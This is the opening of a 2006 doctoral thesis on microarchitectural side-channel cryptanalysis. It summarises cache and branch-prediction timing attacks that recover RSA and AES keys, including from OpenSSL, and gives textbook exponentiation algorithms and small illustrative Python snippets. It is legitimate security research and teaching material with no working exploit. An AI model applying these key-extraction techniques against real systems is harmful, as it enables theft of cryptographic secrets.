AN ABSTRACT OF THE THESIS OF
Onur Acıiçmez for the degree of Doctor of Philosophy in
Electrical and Computer Engineering presented on December 08, 2006.
Title: Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks
Abstract approved:
Çetin Kaya Koç
Cryptographic devices leak easily measurable timing and power consumption information, radiation at various levels, and more. Such devices also have additional inputs other than plaintext and keys, such as the supply voltage, which can be manipulated to force the device to produce faulty outputs that can be used to reveal the secret key. Side-channel cryptanalysis uses the information that leaks through one or more side channels of a cryptographic system to obtain secret information.
The initial focus of side-channel research was on smart card security. There are two main reasons why smart cards were the first type of device to be analyzed extensively from the side-channel point of view. Smart cards store secret values inside the card and are specifically designed to protect and process these secret values. Therefore, there is a serious financial gain involved in cracking smart cards, as well as in analyzing them and developing more secure smart card technologies. The recent promises of the Trusted Computing community to securely store such secret values on PC platforms, c.f. [99], have made the side-channel analysis of PC platforms as desirable as that of smart cards.
The second reason for the high attention to side-channel analysis of smart cards is the ease of applying such attacks to them. Measurements of side-channel information on smart cards are almost “noiseless”, which makes such attacks very practical. On the other hand, many factors affect such measurements on real commodity computer systems. These factors create noise, and it is therefore much more difficult to develop and perform successful attacks on the “real” computers of our daily life. Thus, until very recently, even server systems were not really considered to be at risk from such side-channel attacks. This changed with the work of Brumley and Boneh, c.f. [21], who demonstrated a remote timing attack over a local network.
For these reasons, we have seen an increased research effort on the security analysis of daily life PC platforms from the side-channel point of view. It has been shown, in particular, that the functionality of common components of processor architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which comes in different forms.
In this thesis, we focus on side-channel cryptanalysis of cryptosystems on commodity computer platforms. In particular, we analyze two main CPU components, the cache and the branch prediction unit, from a side-channel point of view. We show that the functionalities of these two components create very serious security risks in software systems, especially in software based cryptosystems.
© Copyright by Onur Acıiçmez
December 08, 2006
All Rights Reserved
Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks
by
Onur Acıiçmez
A THESIS
submitted to
Oregon State University
in partial fulfillment of
the requirements for the
degree of
Doctor of Philosophy
Presented December 08, 2006
Commencement June 2007
Doctor of Philosophy thesis of Onur Acıiçmez presented on December 08, 2006
APPROVED:
Major Professor, representing Electrical and Computer Engineering
Director of the School of Electrical Engineering and Computer Science
Dean of the Graduate School
I understand that my thesis will become part of the permanent collection of Oregon
State University libraries. My signature below authorizes release of my thesis to
any reader upon request.
Onur Acıiçmez, Author
ACKNOWLEDGMENTS
I wish to express my most sincere gratitude to my major professor, Dr.
Çetin Kaya Koç, who recognized my potential, sparked my interest in this particular topic, and guided me throughout the development of this work.
I would like to give my special thanks to Dr. Werner Schindler and Dr.
Jean-Pierre Seifert for introducing me to the challenging field of Side-Channel
Cryptanalysis, and especially for their guidance in conducting this research and
producing the papers which formed a basis for this thesis.
I also thank Dr. Bella Bose, Dr. Timothy Budd, Dr. Ben Lee, Dr. Lien
Mei and Dr. Oksana Ostroverkhova for dedicating their time to participate in my
Ph.D. committee.
The most special thanks go to my parents for both their financial and emotional support throughout my entire education. I would also like to acknowledge the many dear friends, most of whom I have known for more than 20 years, who encouraged me to pursue my graduate education in the USA. I apologize for being unable to list each and every one of those precious individuals on this page.
Thanks also to my colleagues in the Information Security Laboratory for their general support and for being such good friends.
Onur Acıiçmez
Hillsboro, Oregon, December 2006
TABLE OF CONTENTS

1  INTRODUCTION
   1.1  Overview of Side-Channel Analysis
   1.2  The Importance of Side-Channel Analysis on Computer Systems
   1.3  New Side-Channel Sources on Processors: MicroArchitectural Attacks
   1.4  Summary of Our Contributions to the Field
        1.4.1  Chapter 3: Remote Timing Attack on RSA
        1.4.2  Chapter 4: Survey on Cache Attacks
        1.4.3  Chapter 5: Cache Based Remote Timing Attack on the AES
        1.4.4  Chapter 6: Trace-Driven Cache Attacks on AES
        1.4.5  Chapter 7: Predicting Secret Keys via Branch Prediction
        1.4.6  Chapter 8: On the Power of Simple Branch Prediction Analysis
2  BACKGROUND
   2.1  Basics of RSA and Its Implementations
        2.1.1  Overview of RSA
        2.1.2  Exponentiation Algorithms
               2.1.2.1  Binary Square-and-Multiply Exponentiation Algorithm
               2.1.2.2  b-ary Square-and-Multiply Exponentiation Algorithm
               2.1.2.3  Sliding Window Exponentiation
               2.1.2.4  Balanced Montgomery Powering Ladder
        2.1.3  Montgomery Multiplication
        2.1.4  Chinese Remainder Theorem
   2.2  Basics of AES and Its Implementations
        2.2.1  Overview of AES
        2.2.2  AES Software Implementations
   2.3  Basics of Computer Microarchitecture: Cache and Branch Prediction
        2.3.1  Processor Cache
        2.3.2  Branch Prediction Units
3  REMOTE TIMING ATTACK ON RSA
   3.1  General Idea of a Timing Attack on RSA-CRT
   3.2  Overview of Brumley and Boneh Attack
   3.3  Details of Our Approach
   3.4  Implementation Details
   3.5  Experimental Results
        3.5.1  Comparison of our attack and BB-attack
        3.5.2  The details of our attack
               3.5.2.1  The distribution of time differences
               3.5.2.2  Error probabilities and the parameters
   3.6  Conclusion
4  SURVEY ON CACHE ATTACKS
   4.1  The Basics of a Cache Attack
        4.1.1  Basic Attack Models
               4.1.1.1  Model-1
               4.1.1.2  Model-2
   4.2  Cache Attacks in the Literature
        4.2.1  Theoretical Attack of D. Page
        4.2.2  First Practical Implementations
        4.2.3  Bernstein’s Attack
        4.2.4  Percival’s Hyper-Threading Attack on RSA
        4.2.5  Osvik-Shamir-Tromer (OST) Attacks
        4.2.6  Last Round Access-Driven Attack
        4.2.7  Cache-based Power Attack on AES from Bertoni et al.
        4.2.8  Lauradoux’s Power Attack on AES
        4.2.9  Internal Cache Collision Attacks by Bonneau et al.
        4.2.10 Overview of Our Cache Attacks
5  CACHE BASED REMOTE TIMING ATTACK ON THE AES
   5.1  The Underlying Principle of Devising a Remote Cache Attack
   5.2  Details of Our Basic Attack
        5.2.1  First Round Attack
        5.2.2  Second Round Attack – Basic Variant
   5.3  A More Efficient, Universally Applicable Attack
        5.3.1  Comparison with the basic second round attack from Subsect. 5.2.2
   5.4  Experimental Details and Results
   5.5  Scaling the Sample Size N
   5.6  Conclusion
6  TRACE-DRIVEN CACHE ATTACKS ON AES
   6.1  Overview of Trace-Driven Cache Attacks
   6.2  Trace-Driven Cache Attacks on the AES
        6.2.1  Overview of an Ideal Two-Round Attack
        6.2.2  Overview of an Ideal Last Round Attack
        6.2.3  Complications in Reality and Actual Attack Scenarios
        6.2.4  Further Details of Our Attacks
   6.3  Analysis of the Attacks
        6.3.1  Our Model
        6.3.2  Trade-off Between Online and Offline Cost
   6.4  Experimental Details
   6.5  Conclusion
7  PREDICTING SECRET KEYS VIA BRANCH PREDICTION
   7.1  Outlines of Various Attack Principles
        7.1.1  Attack 1 — Exploiting the Predictor Directly (Direct Timing Attack)
               7.1.1.1  Examples of vulnerable systems
        7.1.2  Attack 2 — Forcing the BPU to the Same Prediction (Asynchronous Attack)
               7.1.2.1  Examples of vulnerable systems
        7.1.3  Attack 3 — Forcing the BPU to the Same Prediction (Synchronous Attack)
               7.1.3.1  Examples of vulnerable systems
        7.1.4  Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack)
               7.1.4.1  Examples of vulnerable systems
   7.2  Practical Results
        7.2.1  Results for Attack 2 — Forcing the BPU to the Same Prediction (Asynchronous Attack)
        7.2.2  Results for Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack)
   7.3  Conclusions and recommendations for further research
8  ON THE POWER OF SIMPLE BRANCH PREDICTION ANALYSIS
   8.1  Multi-Threading, spy and crypto processes
   8.2  Improving Trace-driven Attacks against the BTB
   8.3  Practical Results
   8.4  Conclusions
9  CONCLUSION
BIBLIOGRAPHY
LIST OF FIGURES

2.1  Binary version of Square-and-Multiply Exponentiation Algorithm
2.2  b-ary version of Square-and-Multiply Exponentiation Algorithm
2.3  Sliding Window Exponentiation Algorithm
2.4  Balanced Montgomery Powering Ladder
2.5  Montgomery Multiplication Algorithm
2.6  RSA with CRT
2.7  Round operations in AES
2.8  Branch Prediction Unit Architecture
3.1  Modular Exponentiation with Montgomery’s Algorithm
3.2  The distribution of ∆_j in terms of clock cycles for 0 ≤ j ≤ 5000, sorted in descending order, for the sample bit q_61. The graph on the left shows this distribution when q_61 = 1. The distribution on the right is observed when q_61 = 0.
4.1  Cache Attack Model-1
4.2  Cache states
4.3  Two different accesses to the same table
4.4  DES S-Box lookup
6.1  Figure.2
6.2  Figure.3
6.3  Figure.4
7.1  Practical results when using the total eviction method in attack principle 2
7.2  Practical results when using the single eviction method in attack principle 2
7.3  Increasing gap between multiplication and squaring steps due to missing BTB entries
7.4  Connecting the spy-induced BTB misses and the square/multiply cycle gap
8.1  Front-End Instruction Pipeline Stages feeding the µop Queue
8.2  Results of SBPA with an improved resolution
8.3  Enhancing a bad resolution via independent repetition
8.4  Best result of our SBPA against openSSL RSA, yielding 508 out of 512 secret key bits
LIST OF TABLES

3.1  The configuration used in the experiments
3.2  Average ∆ and ∆_BB values and 0-1 gaps. The values are given in terms of clock cycles.
3.3  The percentage of the majority of time differences that are either positive or negative (empirical values)
3.4  Columns 2 and 3 show the parameters that can be used to yield the intended accuracy. The last columns give the expected number of steps for N_max = ∞, calculated using Formula (3.11), to reach the target difference D.
7.1  The configuration used in the experiments
Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks
1. INTRODUCTION
Information security has always been a concern of the human race. Even ancient civilizations developed methods that are the first examples of encryption algorithms. Advances in the security fields, including cryptography, have affected almost every aspect of human life and science. For example, the first programmable Turing machine, which can be considered the first computer ever built, even before ENIAC, was engineered to break cryptosystems like Enigma [104, 45]. The increasing importance of information technologies such as electronic devices, personal computers, and of course the Internet in daily life has broadened the scope of and the need for information security. As a result, security related applications have gained even more popularity and become a fundamental and indispensable part of information systems.
These developments triggered the transition of the responsibility for security critical applications from mainframe computers and custom-built devices to widely used, high-volume manufactured commodity electronics, including personal computers, servers, handheld devices, and smart cards. This transition also mandates a revision of how we design and analyze security systems by identifying, developing, and adapting new security requirements and threat models. The sole purpose of this thesis is to contribute to this revision process. We identify some components of commodity computers as novel and unforeseen security risks. Our findings have significant value for processor vendors, software developers, system designers, security architects, cryptographers, and especially for ongoing secure platform development efforts (c.f. [99]), in the sense that they bring new security requirements and threat models that must be considered during secure microprocessor design, system and software development, and cryptosystem design.
The identification of requirements for secure execution environments has always been a challenging task since the invention of high complexity computing devices. The security requirements of early computer systems were defined with monolithic mainframe computers in mind (c.f. [106, 13, 32] and also [46] for a nice collection of early computer security efforts). Today, the domination of multiuser PC and server platforms and of multitasking operating systems mandates a serious revision of these early requirements. Recently, we have seen an increased effort on the security analysis of daily life computer platforms. Advances in the field, more specifically the desire to develop secure execution technologies such as Intel’s Virtualization Technology (VT) and Trusted Execution Technology (TXT) (codenamed LaGrande Technology or LT for short), play an important role in increasing the attention on the analysis of computer platform security, c.f. [99]. Here, it has been shown in particular that the microarchitectural properties of modern CPUs create a significant security risk, c.f. [5, 1, 2, 14, 72, 73, 80]. In this thesis, we analyze two main CPU components, the cache and the branch prediction unit, from a side-channel point of view. We show that the functionalities of these two components create very serious security risks in software systems, especially in software based cryptosystems.
Cryptosystems have traditionally been analyzed as perfect mathematical objects. In those analyses, the cipher under examination is considered a black box that realizes a mapping from the input values (plaintext and secret key) to an output (ciphertext). The security of a cipher is determined by analyzing its mathematical description via formal and statistical methods. Therefore, conventional cryptography deals only with the mathematical model of the cryptosystems. However, any practical implementation of a cryptosystem causes the leakage of sensitive information due to the unavoidable characteristics of the physical devices, which are ignored in the security models of conventional cryptography.
Side-channel analysis, which is a relatively new area of applied cryptography, tries to fill this gap between the theory of conventional cryptography and the actual physical situations of the real world. Cryptographic devices leak easily measurable timing and power consumption information, radiation at various levels, and more. Such devices also have additional inputs other than plaintext and keys, such as the supply voltage, which can be manipulated to force the device to produce faulty outputs that can be used to reveal the secret key. Side-channel cryptanalysis uses the information that leaks through one or more side channels of a cryptographic system to obtain secret information. It would be unrealistic to explain all the aspects of side-channel cryptanalysis in this document, hence we give only a brief overview in Section 1.1.
1.1. Overview of Side-Channel Analysis
Side channels of a cryptosystem include, but are not restricted to, power consumption, execution time, and electromagnetic emanation. In other words, the secret key of a carelessly designed cryptographic device can be obtained by tracing the power consumption, electromagnetic emanation, and/or the execution time of the device.
An attacker can learn about the processes that occur inside a cryptosystem and gain invaluable information about the secret key by analyzing the power
consumption of the system during encryption/decryption. Integrated circuits are
built out of individual transistors acting as voltage-controlled switches. The motion of electrical charge through these transistors consumes power and produces
electromagnetic radiation, both of which are externally detectable.
Side-channel attacks, including power analysis attacks, have two typical
phases: data collection and data analysis. Data collection involves sampling a
device’s side-channel information, i.e., the power consumption or electromagnetic
emanation as a function of time. In this phase, a sample of cryptographic operations, all executed under the same key, is inspected. The next phase
involves the analysis of the collected data and extracting information about the
key.
There are mainly two types of power analysis known in the literature: Simple Power Analysis (SPA) and Differential Power Analysis (DPA). SPA attacks
involve direct interpretation of power consumption measurements collected during
cryptographic computations. The sequence of performed operations determines
the amount of power consumed by an electronic device. SPA attacks rely on observing the power consumption traces of an active device and these observations
can reveal the sequence of operations executed in that device during a cryptographic computation. The operation sequences of some cipher implementations
can directly be translated into the value of the secret key. DPA attacks are more
powerful than SPA attacks, and they are harder to prevent. While SPA attacks
use visual inspection to identify power fluctuations, DPA attacks use sophisticated
statistical analysis and error-correction techniques to extract information about
the secret key.
The principles of Simple Power Analysis (SPA) and Differential Power
Analysis (DPA) rely on the power consumption variations that are generated as a
consequence of varying sequences of operations executed depending on the values
of plaintext inputs and the secret key. Similarly, Simple Electromagnetic Analysis
(SEMA) and Differential Electromagnetic Analysis (DEMA) allow retrieving the
key using the same concept as well, except that they use electromagnetic radiation
measurements instead of power consumption.
In this thesis, we mainly focus on a specific type of side-channel attack, called a timing attack, which uses the execution time of cryptographic devices to reveal the secret data. In a timing attack, the adversary observes the running time of a cryptosystem for different inputs and compromises the secret key using this time behavior. Timing attacks are based on the fact that certain cryptosystems take different amounts of time to process different inputs.
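To make the two-phase structure of such an attack concrete, the following minimal Python sketch shows a hypothetical data collection step: the running time of the same secret-key operation is sampled for many random inputs and stored for later statistical analysis. The victim function, the toy parameters, and the sample count are illustrative assumptions, not measurements from this thesis.

import time
import secrets

def victim_decrypt(ciphertext: int, d: int, n: int) -> int:
    # Stand-in for a secret-key operation whose running time may depend
    # on the operands (hypothetical example, not a real target).
    return pow(ciphertext, d, n)

def collect_timings(d: int, n: int, num_samples: int = 1000):
    samples = []
    for _ in range(num_samples):
        c = secrets.randbelow(n)              # choose a random input
        start = time.perf_counter_ns()        # data collection: time one operation
        victim_decrypt(c, d, n)
        elapsed = time.perf_counter_ns() - start
        samples.append((c, elapsed))          # keep (input, time) pairs for analysis
    return samples

if __name__ == "__main__":
    p, q, e = 61, 53, 17                      # toy parameters only
    n, phi = p * q, (p - 1) * (q - 1)
    d = pow(e, -1, phi)
    data = collect_timings(d, n, num_samples=100)
    print(len(data), "timing samples collected")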
So far, the typical targets of side-channel attacks have been smart cards. The side-channel analysis of computer systems attracted much less attention compared to smart cards; the main reasons for this trend are explained in Section 1.2. However, due to recent advances in the security area, side-channel analysis of computer systems has gained significant importance. Moreover, it has been realized that some of the components of modern computer microarchitectures leak certain side-channel information and thus create unforeseen security risks, c.f. [5, 1, 2, 73, 14, 80]. In this thesis, we tackle this particular problem and contribute to the field via the identification, analysis, and mitigation of microarchitectural side-channel vulnerabilities.
1.2. The Importance of Side-Channel Analysis on Computer Systems
Side-channel cryptanalysis has attracted very significant attention since
Kocher’s discoveries of timing and power analysis attacks [59, 60]. He showed that
cryptographic implementations leak sensitive information because of the physical
properties and requirements of the devices the systems are implemented on. Classical cryptography, which analyzes cryptosystems as perfect mathematical objects and ignores the physical analysis of the implementations, fails to identify such side-channel leakages. Therefore, it is essential to utilize both classical cryptography and side-channel cryptanalysis in order to develop and implement secure systems.
The initial focus of side-channel research was on smart card security. A smart card is a standard credit card-sized plastic token with an embedded microchip that makes it “smart”. Smart cards are used for identification or financial transactions and therefore need built-in security features. In today’s smart cards, the clock signal and the electrical power are among the inputs supplied from the outside. Hence, the power consumption and the execution time of a smart card are very easy to measure with almost no noise. This property of smart cards makes them more vulnerable to side-channel attacks than computer systems.
The security community has a more or less clear picture of what the side-channel vulnerabilities of smart cards are, what the threat models are, and how to mitigate side-channel attacks on smart cards. There are two main reasons why smart cards were the first type of device to be analyzed extensively from the side-channel point of view. Smart cards store secret values inside the card and are specifically designed to protect and process these secret values. Therefore, there is a serious financial gain involved in cracking smart cards, as well as in analyzing them and developing more secure smart card technologies. The recent promises of the Trusted Computing community to securely store such secret values on PC platforms, c.f. [99], have made the side-channel analysis of PC platforms as desirable as that of smart cards.
The second reason for the high attention to side-channel analysis of smart cards is the ease of applying such attacks to them. Measurements of side-channel information on smart cards are almost “noiseless”, which makes such attacks very practical. On the other hand, many factors affect such measurements on real commodity computer systems. These factors create noise, and it is therefore much more difficult to develop and perform successful attacks on the “real” computers of our daily life. Thus, until very recently, even server systems were not really considered to be at risk from such side-channel attacks. This changed with the work of Brumley and Boneh, c.f. [21], who demonstrated a remote timing attack over a local network. They adapted the attack principle introduced in [85] to show that side-channel attacks are a real danger not only to smart cards but also to widely used computer systems.
1.3. New Side-Channel Sources on Processors: MicroArchitectural Attacks
For these reasons, we have seen an increased research effort on the security analysis of daily life PC platforms from the side-channel point of view. It has been shown, in particular, that the functionality of common components of processor architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which comes in different forms. Although the cache itself has long been known to be a crucial security risk of modern CPUs, c.f. [95, 48], the works [5, 14, 73, 80] were the first to demonstrate such vulnerabilities in practice and raised broad public interest in them. These advances initiated a new research vector to identify, analyze, and mitigate the security vulnerabilities that are created by the design and implementation of processor components.
Especially in the light of ongoing Trusted Computing efforts, c.f. [99], which promise to turn the commodity PC platform into a trustworthy platform, c.f. also [25, 35, 42, 79, 99, 103], the formerly described side-channel attacks against PC platforms are of particular interest. This is due to the fact that side-channel attacks have so far been completely ignored by the Trusted Computing community. Even more interesting is the fact that all of the above pure software side-channel attacks also allow a totally unprivileged process to attack other processes running in parallel on the same processor (or even remotely), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This means, in particular, that side-channel attacks render the sophisticated protection mechanisms described, e.g., in [42, 103] useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks simply exploit deeper processor ingredients, i.e., components below the trust architecture boundary, c.f. [81, 42].
We define MicroArchitectural Side-Channel Attacks as the attacks that
exploit the side-channel leakage due to the microarchitectural properties of microprocessors. So far, we have seen two types of microarchitectural attacks, cache
and branch prediction analysis, which are discussed in detail in this thesis.
1.4. Summary of Our Contributions to the Field
In this document, we present the details of our work in the area of MicroArchitectural Side-Channel Analysis. We also give an overview of the first remote timing attack on computers, i.e., the Brumley and Boneh attack [21], and propose certain improvements over this original attack.
The following subsections summarize our contributions and also the content
of this thesis.
1.4.1. Chapter 3: Remote Timing Attack on RSA
Since the remarkable work of Kocher [59], several papers considering different types of timing attacks have been published. In 2003, Brumley and Boneh
presented a timing attack on unprotected OpenSSL implementations [21]. In this
chapter, we discuss how to improve the efficiency of their attack by a factor of
more than 10. We exploit the timing behavior of Montgomery multiplications in
the table initialization phase, which allows us to increase the number of multiplications that provide useful information to reveal one of the prime factors of RSA
moduli. We also present other improvements, which can be applied to the attack
in [21].
1.4.2. Chapter 4: Survey on Cache Attacks
This chapter gives a nice overview of current cache-based side-channel attacks in the literature. We first describe two different attack models that constitute the basis of various cache-based attacks. Then we discuss the details of each
cache attack seperately. We omit the details of our own attacks in this chapter,
since they are discussed in depth in the following chapters.
1.4.3. Chapter 5: Cache Based Remote Timing Attack on the
AES
We introduce a new robust cache-based timing attack on AES. We present
experiments and concrete evidence that our attack can be used to obtain secret
keys of remote cryptosystems if the server under attack runs on a multitasking
or simultaneous multithreading system with a large enough workload. This is an important difference from recent cache-based timing attacks, as those attacks either did not provide any supporting experimental results indicating whether they can be applied remotely, or they were not realistically remote attacks.
1.4.4. Chapter 6: Trace-Driven Cache Attacks on AES
In this chapter, we present efficient trace-driven cache attacks on a widely
used implementation of the AES cryptosystem. We also evaluate the cost of
the proposed attacks in detail under the assumption of a noiseless environment.
We develop an accurate mathematical model that we use in the cost analysis
of our attacks. We use two different metrics, specifically, the expected number
of necessary traces and the cost of the analysis phase, for the cost evaluation
purposes. Each of these metrics represents the cost of a different phase of the
attack.
1.4.5. Chapter 7: Predicting Secret Keys via Branch Prediction
This chapter announces a new software side-channel attack — enabled by
the branch prediction capability common to all modern high-performance CPUs.
The penalty paid (extra clock cycles) for a mispredicted branch can be used for
cryptanalysis of cryptographic primitives that employ a data-dependent program
flow. Analogous to the recently described cache-based side-channel attacks, our attacks also allow an unprivileged process to attack other processes running in parallel on the same processor, despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. In this chapter, we discuss several such attacks for the example of RSA, and experimentally show their applicability to real systems, such as OpenSSL and Linux. Moreover, we also demonstrate the strength of the branch prediction side-channel attack by rendering the obvious countermeasure in this context (Montgomery Multiplication with dummy reduction) useless. Although the deeper consequences of the latter result make writing an efficient and secure modular exponentiation (or scalar multiplication on an elliptic curve) a challenging task, we eventually suggest some countermeasures to mitigate branch prediction side-channel attacks.
1.4.6. Chapter 8: On the Power of Simple Branch Prediction
Analysis
Very recently, we discovered a new software side-channel attack, called the Branch Prediction Analysis (BPA) attack, and demonstrated its practicality on popular commodity PC platforms. While that attack still had the flavor of a classical timing attack against RSA, where one uses many execution-time measurements under the same key in order to statistically amplify some small but key-dependent timing differences, we dramatically improve upon the former result. We prove that a carefully written spy process running simultaneously with an RSA process is able to collect almost all of the secret key bits during a single RSA signing execution. We call such an attack, which analyzes the CPU’s Branch Predictor states by spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack, sharply differentiating it from those relying on statistical methods and requiring many computation measurements under the same key.
The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so-called randomization techniques to protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless. In addition to this very crucial security implication, which targets implementations assumed to be at least statistically secure, our successful SBPA attack bears another, equally critical security implication. Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks. Unfortunately, this is not true, as even such “balanced branch” implementations can be completely broken by our SBPA attacks. Moreover, despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that SBPA attacks are much more dangerous than previously anticipated, as they obviously do not belong to the same category as pure timing attacks.
2. BACKGROUND
In this section, we give the necessary background information to understand the rest of this document. This section focuses on two encryption algorithms: RSA, which is the most widely used public-key cryptosystem, and AES,
which is the new American standard for secret-key encryption. We also give basic
information on some of the processor components, more specifically on the cache
and branch prediction unit, which are analyzed from a side-channel point of view
in this document.
In order to keep this document at a reasonable size, we omit many details on the aforementioned subjects. We simply refer the reader to the following references for further details:
• Cryptography: [64, 90, 97, 56, 96, 104, 98]
• RSA: [82, 17, 12, 49, 50, 84, 29, 57, 58]
• AES: [31, 8, 9]
• Computer Architecture: [41, 78, 33, 91, 92]
2.1. Basics of RSA and Its Implementations
In this section, we give the necessary information about RSA and specific implementation techniques so that the reader can understand the attacks we explain in the following sections. We start with an overview of the RSA cryptosystem. Then we cover some of the exponentiation techniques and efficient modular multiplication algorithms. All of these algorithms are currently being used in various implementations of RSA. The reader should note that this section is not comprehensive in terms of the algorithms used in RSA implementations. However, we cover everything necessary to grasp the basic ideas presented in this document.
2.1.1. Overview of RSA
RSA is a public key cryptosystem developed by Rivest, Shamir and Adleman [82]. The main computation in RSA decryption is the modular exponentiation

P = M^d (mod N),

where M is the message or the ciphertext, d is the private key, which is kept secret, and N is the public modulus, which is known to everyone. N is the product of two large primes p and q. The strength of RSA comes from the hardness of the factorization problem: it is assumed that even though N is a publicly known number, the factors of N cannot be calculated.
If an adversary obtains the secret value d, he can read all of the encrypted
messages and impersonate the owner of the key. Therefore, the main purpose of
using side-channel attacks on RSA is to reveal this secret value. If the adversary
can factorize N , i.e. he can obtain either p or q, the value of d can easily be
calculated. Hence, the attacker tries to find either p, q, or d.
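As a concrete illustration of why the factors must remain secret, the following Python sketch derives the private exponent d directly from p and q once they are known. The toy parameters are hypothetical and far too small for real use; they only serve to show the arithmetic.

def recover_private_exponent(p: int, q: int, e: int) -> int:
    # Given the prime factors of N and the public exponent e,
    # compute the private exponent d (textbook RSA, toy sizes).
    phi = (p - 1) * (q - 1)        # Euler's totient of N = p*q
    return pow(e, -1, phi)         # modular inverse of e (Python 3.8+)

p, q, e = 61, 53, 17               # hypothetical toy parameters
n = p * q
d = recover_private_exponent(p, q, e)
m = 42
c = pow(m, e, n)                   # encrypt
assert pow(c, d, n) == m           # the recovered d decrypts correctly
print("recovered d =", d)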
Since the size of the key, i.e. the size of d, in RSA is very large, e.g. around
1024 or 2048 bits, the exponentiation is very expensive in terms of execution time.
Therefore the actual implementations of RSA need to employ efficient algorithms
to calculate the result of this operation. In the next subsections, we will explain
the most widely used algorithms, which can also be exploited in side-channel
attacks.
2.1.2. Exponentiation Algorithms
In this subsection, four different methods to compute an exponentiation
are presented. For a more comprehensive treatment of exponentiation techniques,
we refer the reader to [57, 64]. Let us say we want to compute M^d (mod N), where d is an n-bit number, i.e., d = (d_0, d_1, ..., d_{n−1})_2.
2.1.2.1. Binary Square-and-Multiply Exponentiation Algorithm
The binary version of the Square-and-Multiply Algorithm (SM) is the simplest way to perform an exponentiation. Figure 2.1 shows the steps of SM, which processes the bits of d from left to right. There are also versions of the SM algorithm that process d in reverse order. The reader should note that all of the
multiplications and squarings are shown as modular operations, although the basic
SM algorithm computes regular exponentiations. This is because RSA performs
modular exponentiation, and our focus is on this cryptosystem. In an efficient RSA
implementation, all of the multiplications and squarings are performed by using a
special modular multiplication algorithm called Montgomery Multiplication (c.f.
Section 2.1.3).
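For readers who prefer runnable code to pseudocode, the following minimal Python sketch renders the left-to-right binary square-and-multiply method of Figure 2.1. It is an illustration only, not the OpenSSL code analyzed later; note the key-dependent multiplication inside the loop, which is exactly the kind of branch exploited in later chapters.

def square_and_multiply(m: int, d: int, n: int) -> int:
    # Left-to-right binary square-and-multiply, computing m^d mod n.
    bits = bin(d)[2:]              # bits of d, most significant first
    s = m                          # the leading bit is 1, so start with m
    for bit in bits[1:]:
        s = (s * s) % n            # a squaring happens for every bit
        if bit == "1":
            s = (s * m) % n        # extra multiplication only when the bit is 1
    return s

# quick self-check against Python's built-in modular exponentiation
assert square_and_multiply(7, 560, 561) == pow(7, 560, 561)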
2.1.2.2. b-ary Square-and-Multiply Exponentiation Algorithm
A more advanced version of SM, called the b-ary method, decreases the total number of multiplications during the exponentiation. In this method, the n-bit exponent d is considered to be in radix-2^b form, i.e., d = (d_0, d_1, ..., d_{k−1})_{2^b}, where n = k ∗ b. It requires a preprocessing phase to compute multiples of M
S = M
for i from 1 to n − 1 do
    S = S ∗ S (mod N)
    if d_i = 1 then
        S = S ∗ M (mod N)
return S

FIGURE 2.1. Binary version of Square-and-Multiply Exponentiation Algorithm
so that many multiplications can be combined during the exponentiation phase.
The steps of this algorithm are shown in Figure 2.2.
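A short Python sketch of this fixed-window (b-ary) method may also help; it is an illustration of ours, with the table initialization phase written out explicitly because a table initialization of this kind is what the attack in Chapter 3 exploits. Function and parameter names are our own.

def b_ary_exponentiation(m: int, d: int, n: int, b: int = 4) -> int:
    # Fixed-window (b-ary) exponentiation, computing m^d mod n.
    # Table initialization phase: table[i] = m^i mod n for i = 0 .. 2^b - 1.
    table = [1] * (1 << b)
    for i in range(1, 1 << b):
        table[i] = (table[i - 1] * m) % n

    # Split d into b-bit digits, most significant digit first.
    digits = []
    while d:
        digits.append(d & ((1 << b) - 1))
        d >>= b
    digits.reverse()

    # Exponentiation phase: b squarings per digit, then one table multiplication.
    s = 1
    for digit in digits:
        for _ in range(b):
            s = (s * s) % n
        if digit:
            s = (s * table[digit]) % n
    return s

assert b_ary_exponentiation(7, 123456789, 1000000007) == pow(7, 123456789, 1000000007)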
2.1.2.3. Sliding Window Exponentiation
This algorithm is very similar to the b-ary method, except for a slight modification. In the b-ary method, the exponent d is split into consecutive ‘windows’ of b bits each. The number of multiplications can be further decreased by splitting d into odd-valued windows of at most b consecutive bits, where the windows are not necessarily adjacent and may be separated by zero bits (c.f. Figure 2.3).
2.1.2.4. Balanced Montgomery Powering Ladder
In the context of side channel attacks, c.f. [28, 59, 52], it was quickly
“agreed” that simple side-channel attacks could be (simply) mitigated by avoiding
e_1 = M
for i from 2 to 2^b − 1 do
    e_i = e_{i−1} ∗ M (mod N)
S = e_{d_0}
for i from 1 to k − 1 do
    S = S^{2^b} (mod N)
    if d_i ≠ 0 then
        S = S ∗ e_{d_i} (mod N)
return S

FIGURE 2.2. b-ary version of Square-and-Multiply Exponentiation Algorithm
e_1 = M,  e_2 = M^2 (mod N)
for i from 1 to 2^{b−1} − 1 do
    e_{2i+1} = e_{2i−1} ∗ e_2 (mod N)
S = 1,  i = 0
while i < k do
    if d_i = 0 then
        S = S ∗ S (mod N)
        i = i + 1
    else
        find the maximum t such that t − i + 1 ≤ b, t < k, and d_t = 1
        l = (d_i, ..., d_t)_2
        S = S^{2^{t−i+1}} ∗ e_l (mod N)
        i = t + 1
return S

FIGURE 2.3. Sliding Window Exponentiation Algorithm
R_0 = 1;  R_1 = M
for i from 0 to n − 1 do
    if d_i = 0 then
        R_1 = R_0 ∗ R_1 (mod N)
        R_0 = R_0 ∗ R_0 (mod N)
    else [if d_i = 1] then
        R_0 = R_0 ∗ R_1 (mod N)
        R_1 = R_1 ∗ R_1 (mod N)
return R_0

FIGURE 2.4. Balanced Montgomery Powering Ladder
